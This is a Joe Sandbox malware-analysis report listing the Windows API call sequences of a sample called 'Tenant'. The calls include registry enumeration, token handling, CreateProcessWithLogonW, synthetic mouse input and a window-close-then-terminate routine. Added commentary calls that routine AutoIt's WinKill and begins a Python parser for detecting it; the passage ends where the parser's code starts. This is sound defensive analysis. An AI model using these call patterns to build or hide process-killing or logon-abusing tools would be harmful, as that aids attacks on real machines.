                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3253778849-0
                                                                                        • Opcode ID: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                        • Instruction ID: 0436842b0d571bf6efecfd3c22fe175293ba0b1856d284570d03e463fe3ebdd7
                                                                                        • Opcode Fuzzy Hash: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                        • Instruction Fuzzy Hash: 3861BC3060029AABDF11EF60CD92EFE3BA8EF4A308F454599F8556B1D2DB30AD55CB50
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00B2147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2040D,?,?), ref: 00B21491
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2091D
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2095D
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B20980
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B209A9
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B209EC
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B209F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4046560759-0
                                                                                        • Opcode ID: 8e6f0e92b50e6d8fc494b03be80c93b199a1e786450c72924b6f4fcae474d997
                                                                                        • Instruction ID: 1c4fb13a75428c3f90679120678eac26894bec4926856fef31766c64432792d1
                                                                                        • Opcode Fuzzy Hash: 8e6f0e92b50e6d8fc494b03be80c93b199a1e786450c72924b6f4fcae474d997
                                                                                        • Instruction Fuzzy Hash: 6F517931218204AFD704EF68C995E6EBBE8FF85314F04495DF58A872A2DB31E945CB52
                                                                                        APIs
                                                                                        • GetMenu.USER32(?), ref: 00B25E38
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00B25E6F
                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B25E97
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00B25F06
                                                                                        • GetSubMenu.USER32(?,?), ref: 00B25F14
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B25F65
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                        • String ID:
                                                                                        • API String ID: 650687236-0
                                                                                        • Opcode ID: 630b282c6db96b1ebda8fe408418e609696853e6953d377b4e689fbdf07cc0f1
                                                                                        • Instruction ID: e09ec9e3d8921107bf8edf4a0e94e10e7c01bbe0a98580d52bab5b208fbb6a45
                                                                                        • Opcode Fuzzy Hash: 630b282c6db96b1ebda8fe408418e609696853e6953d377b4e689fbdf07cc0f1
                                                                                        • Instruction Fuzzy Hash: 4751A035A00625AFCF21EF64D945AAEB7F5EF48310F114099F915BB391CB70AE418B91
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00AFF6A2
                                                                                        • VariantClear.OLEAUT32(00000013), ref: 00AFF714
                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00AFF76F
                                                                                        • _memmove.LIBCMT ref: 00AFF799
                                                                                        • VariantClear.OLEAUT32(?), ref: 00AFF7E6
                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AFF814
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1101466143-0
                                                                                        • Opcode ID: ad228e1e60e6b59f631de0a08141b1d286b83a053e4103cb51bde508f77ed72a
                                                                                        • Instruction ID: 969474e81ebffbda06e10011eb3e62fd1ed29c38d598ea25f3a37476f7d5edc7
                                                                                        • Opcode Fuzzy Hash: ad228e1e60e6b59f631de0a08141b1d286b83a053e4103cb51bde508f77ed72a
                                                                                        • Instruction Fuzzy Hash: 77514AB5A00209EFCB14DF58C894AAAB7B8FF4C354B15856AFA59DB304D730E911CFA0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B029FF
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02A4A
                                                                                        • IsMenu.USER32(00000000), ref: 00B02A6A
                                                                                        • CreatePopupMenu.USER32 ref: 00B02A9E
                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00B02AFC
                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B02B2D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3311875123-0
                                                                                        • Opcode ID: e99cb547bf2754d57ca94385eaf86dd2387faa231d2bcbaa85af6406c3442929
                                                                                        • Instruction ID: 358acfcd25e27b55cd84c18e66294a95bf129fdd0a7a6f31ec6f9392b266f749
                                                                                        • Opcode Fuzzy Hash: e99cb547bf2754d57ca94385eaf86dd2387faa231d2bcbaa85af6406c3442929
                                                                                        • Instruction Fuzzy Hash: 18518A70A0024AEBDF25DF68D88CBAEBFF4EF54314F104199E8159B2E1EB709949CB51
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00AA1B76
                                                                                        • GetWindowRect.USER32(?,?), ref: 00AA1BDA
                                                                                        • ScreenToClient.USER32(?,?), ref: 00AA1BF7
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AA1C08
                                                                                        • EndPaint.USER32(?,?), ref: 00AA1C52
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                        • String ID:
                                                                                        • API String ID: 1827037458-0
                                                                                        • Opcode ID: acd8f3a2af6a3a36646cb19e48235ef684a37d70be949b48b4b07f26268ac60c
                                                                                        • Instruction ID: 73a2bf8acd87a1d84f70c416810eed869c2c28260e588171cdffa54873457783
                                                                                        • Opcode Fuzzy Hash: acd8f3a2af6a3a36646cb19e48235ef684a37d70be949b48b4b07f26268ac60c
                                                                                        • Instruction Fuzzy Hash: 7141AC30244200AFD710EF25CC99FAA7BF8EF4A764F140669F9A5872E2CB719C45DB61
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00B677B0,00000000,01125678,?,?,00B677B0,?,00B2BC1A,?,?), ref: 00B2BD84
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00B2BDA8
                                                                                        • ShowWindow.USER32(00B677B0,00000000,01125678,?,?,00B677B0,?,00B2BC1A,?,?), ref: 00B2BE08
                                                                                        • ShowWindow.USER32(00000000,00000004,?,00B2BC1A,?,?), ref: 00B2BE1A
                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 00B2BE3E
                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B2BE61
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 642888154-0
                                                                                        • Opcode ID: 8d1cdb20b5f22282fe47f63b812c153baa84e777674adcfe39b63e7166fd5784
                                                                                        • Instruction ID: 6d50e52ca649a64ac864a09e3f7fb682f397584dbaa736698fbff8cc9dd448f4
                                                                                        • Opcode Fuzzy Hash: 8d1cdb20b5f22282fe47f63b812c153baa84e777674adcfe39b63e7166fd5784
                                                                                        • Instruction Fuzzy Hash: EA411534600164AFDB26DF28D49AFD47BE1EF05314F2981F9EA4C8F2A2CB31A845CB51
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00B1550C,?,?,00000000,00000001), ref: 00B17796
                                                                                          • Part of subcall function 00B1406C: GetWindowRect.USER32(?,?), ref: 00B1407F
                                                                                        • GetDesktopWindow.USER32 ref: 00B177C0
                                                                                        • GetWindowRect.USER32(00000000), ref: 00B177C7
                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B177F9
                                                                                          • Part of subcall function 00B057FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05877
                                                                                        • GetCursorPos.USER32(?), ref: 00B17825
                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B17883
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4137160315-0
                                                                                        • Opcode ID: 59fa385b5dc6de46a5548e3fab63bd91e69018665a9ef3edbdc6b996e739520b
                                                                                        • Instruction ID: 1aaf95da435e4298e0e129fc0ec63aa915bd692be2b55f5c4e9ff9606d52152c
                                                                                        • Opcode Fuzzy Hash: 59fa385b5dc6de46a5548e3fab63bd91e69018665a9ef3edbdc6b996e739520b
                                                                                        • Instruction Fuzzy Hash: E331AC72508305ABD720EF158849E9FBBEAFF88314F100959F589A7191CA30E948CBA2
                                                                                        APIs
                                                                                          • Part of subcall function 00AF8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AF8CDE
                                                                                          • Part of subcall function 00AF8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AF8CE8
                                                                                          • Part of subcall function 00AF8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AF8CF7
                                                                                          • Part of subcall function 00AF8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AF8CFE
                                                                                          • Part of subcall function 00AF8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AF8D14
                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00AF904D), ref: 00AF9482
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AF948E
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00AF9495
                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00AF94AE
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00AF904D), ref: 00AF94C2
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00AF94C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                        • String ID:
                                                                                        • API String ID: 3008561057-0
                                                                                        • Opcode ID: 5c54aad9c83b82f393eae0200248b2e9071f032dace2d437ea5b3b6003913d2e
                                                                                        • Instruction ID: 8d21e999ac56b68228615e4803c0ddec3d035ead578c9f9499773d28624f0fa0
                                                                                        • Opcode Fuzzy Hash: 5c54aad9c83b82f393eae0200248b2e9071f032dace2d437ea5b3b6003913d2e
                                                                                        • Instruction Fuzzy Hash: A311B131511608FFDB149FA4CC19BBF7BA9FF55316F208018FA85A7210CB399901DB60
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AF9200
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00AF9207
                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AF9216
                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00AF9221
                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AF9250
                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00AF9264
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                        • String ID:
                                                                                        • API String ID: 1413079979-0
                                                                                        • Opcode ID: 254839e1f495eb8d458fe1821ef5db51658e4bce75e0995fb9a0c87a30a9ef7b
                                                                                        • Instruction ID: 4989ca64376b8e4c1ad5486fffce8674f07d5083fcd4f0d192c69af50d6369e7
                                                                                        • Opcode Fuzzy Hash: 254839e1f495eb8d458fe1821ef5db51658e4bce75e0995fb9a0c87a30a9ef7b
                                                                                        • Instruction Fuzzy Hash: C911567250120EABDF019FE4ED89FEE7BA9EF08304F144164FE04A2160C7729E64EB60
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00AFC34E
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00AFC35F
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AFC366
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00AFC36E
                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00AFC385
                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00AFC397
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: 1f33a2afb6efb72778ad5fab41ab9ae5bd11cc1cdf51040fdf0e04f602403027
                                                                                        • Instruction ID: 96330b90a3edb7abd6b09fe5248f0bddb805de81364577294efc3cd571d044f3
                                                                                        • Opcode Fuzzy Hash: 1f33a2afb6efb72778ad5fab41ab9ae5bd11cc1cdf51040fdf0e04f602403027
                                                                                        • Instruction Fuzzy Hash: D2014875E00218BBDF105BE69D45A5EBFB8EF48761F104065FA04AB240DA709D10CF51
                                                                                        APIs
                                                                                          • Part of subcall function 00AA16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA1729
                                                                                          • Part of subcall function 00AA16CF: SelectObject.GDI32(?,00000000), ref: 00AA1738
                                                                                          • Part of subcall function 00AA16CF: BeginPath.GDI32(?), ref: 00AA174F
                                                                                          • Part of subcall function 00AA16CF: SelectObject.GDI32(?,00000000), ref: 00AA1778
                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B2C57C
                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00B2C590
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B2C59E
                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00B2C5AE
                                                                                        • EndPath.GDI32(00000000), ref: 00B2C5BE
                                                                                        • StrokePath.GDI32(00000000), ref: 00B2C5CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                        • String ID:
                                                                                        • API String ID: 43455801-0
                                                                                        • Opcode ID: a6927655ae4d2d3b47820055e23d628fd9cca7c08441897881a711fa7742c908
                                                                                        • Instruction ID: 3f3dc6ff47ff1abb1ef6f0937c5480bf794ba65d04e77f3e7c54ed7a90a97ae6
                                                                                        • Opcode Fuzzy Hash: a6927655ae4d2d3b47820055e23d628fd9cca7c08441897881a711fa7742c908
                                                                                        • Instruction Fuzzy Hash: 57110C7200010CBFDF02AF91DC89E9A7FADEF08354F148061F9185A1A1CB71AE55DBA0
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AC07EC
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AC07F4
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AC07FF
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AC080A
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AC0812
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AC081A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: 3487492dba81ce53d4e1077319d0c77548f87054eec09b55d27528ee2a038c7e
                                                                                        • Instruction ID: 8288516cfcc0fecd6e80b58bff483bedf226b1a9cf9a2874e9c257bda6c450d6
                                                                                        • Opcode Fuzzy Hash: 3487492dba81ce53d4e1077319d0c77548f87054eec09b55d27528ee2a038c7e
                                                                                        • Instruction Fuzzy Hash: 32016CB09017597DE3009F5A8C85B56FFE8FF59354F00411BA15C47941C7F5A864CBE5
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B059B4
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B059CA
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00B059D9
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B059E8
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B059F2
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B059F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        • Opcode ID: df021b9274914c365f85268779983bea7d9f84599e0679c48195fe207a5b9a4e
                                                                                        • Instruction ID: a6faf29e68f67a38920159ac0aa488d146cb51e818f6929c5212af7f0051cad3
                                                                                        • Opcode Fuzzy Hash: df021b9274914c365f85268779983bea7d9f84599e0679c48195fe207a5b9a4e
                                                                                        • Instruction Fuzzy Hash: 03F03A32251558BBE7216B929C0EEEF7F7CEFCAB21F100159FA05E2050EFA01A1187B5
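The function listed directly above is a generic "close the window, then kill its owner" routine: message 0x10 is WM_CLOSE, 0x1F0FFF is PROCESS_ALL_ACCESS, and the OpenProcess/TerminateProcess pair follows GetWindowThreadProcessId on the same window handle. Combined with the AUTOIT.ERROR string seen further down this report, this reads like the AutoIt runtime's WinKill implementation, though that attribution is an inference, not something the sandbox states. Triaging a report of this size by eye is impractical, so the following is an added example (not part of the Joe Sandbox output and not the sample's code) that parses the "APIs" call listings in this report format and flags the kill pattern. The sample input is an excerpt copied from the two function blocks above; the rule names and thresholds are the author's own choices.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One call line of the Joe Sandbox IDA-plugin "APIs" listing, e.g.
#   • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00B059E8
#   • _memset.LIBCMT ref: 00B0332E                      (no argument list)
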